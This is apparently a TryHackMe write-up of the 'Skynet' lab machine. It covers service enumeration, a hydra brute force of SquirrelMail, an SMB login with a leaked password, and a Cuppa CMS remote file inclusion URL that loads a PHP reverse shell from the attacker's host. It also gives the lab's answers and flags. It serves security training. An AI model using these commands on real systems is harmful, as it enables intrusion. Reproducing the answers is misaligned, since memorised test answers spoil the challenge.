Skynet — THM WriteUp
A vulnerable Terminator themed Linux machine.

What is Miles password for his emails?
In the nmap scan we found the following ports:
$ sudo nmap -sCV -T4 -vvv 10.10.4.21 -p-
...
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 63 Dovecot imapd
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)This is what we find when accessing the http server through port 80:

Using the dirsearch tool, we know that there are several internal pages but we cannot access them: /css, /config, /admin and /js. However, there is one that we can access: /squirrelmail:

As far as we can see, it is a SquirrelMail server with verison 1.4.23, which makes a lot of sense since on port 110 we found Dovecot pop3d.
Using the enum4linux command, we find that there is a share on the samba server that we can access:
enum4linux -a 10.10.4.21
...
//10.10.4.21/anonymous Mapping: OK Listing: OK
In addition, enum4linux reports some users:

When entering the samba server, there is a file and a folder with logs that we are going to download. The files inside are:

In the file attention.txt, we can read:
> A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. - Miles Dyson
Log files 2 and 3 are empty, but log1.txt shows passwords or possible users of the system:

After reading this, I intercepted the login request and used hydra to do a brute force attack using the user milesdyson:
POST /squirrelmail/src/redirect.php HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
...
login_username=USERNAME&secretkey=PASSWORD&js_autodetect_results=1&just_logged_in=1└─$ hydra -l milesdyson -P log1.txt 10.10.4.21 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect" -I
...
[80][http-post-form] host: 10.10.4.21 login: milesdyson password: cyborg007haloterminatorWe already have the milesdyson email password:
Q1: milesdyson:cyborg007haloterminator
What is the hidden directory?
When entering the mail, we will see the following subjet: “Samba Password reset”, it tells us that the smb password has been changed to )s{A&2Z=F^n_E.B`.

In this way, we will log in to smb with this user
smbclient //10.10.4.21/milesdyson -U milesdysonWhen you enter smb, there is a folder notes, there is a file called important.txt with the following content:
> 1. Add features to beta CMS /45kra24zxs28v3yd
> 2. Work on T-800 Model 101 blueprints
> 3. Spend more time with my wife
Q2: /45kra24zxs28v3yd
What is the vulnerability called when you can include a remote file for malicious purposes?
Q3: Remote file inclusion
What is the user flag?
Going back to q2’s answer, searching with dirsearch I came across a page in /…/administrator with a cms called cuppa:

I found the following exploit in exploit-db
This one, it seems, exploits a php injection vulnerability. And from it, files can be read:

So I opened an http server where I had the PentestMonkey PHP Shell and entered it this way in the url:
IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.251.175/php-reverse-shell.php
Q4: 7ce5c2109a40f958099283600a9ae807
What is the root flag?
I ran linpeas, and it reported that this exploit was quite likely to work:

So I downloaded it and compiled it, and when I ran it, it directly made me root user with maximum privileges:

Q5: 3f0372db24753accc7179a282cd6a949

<3 Carlos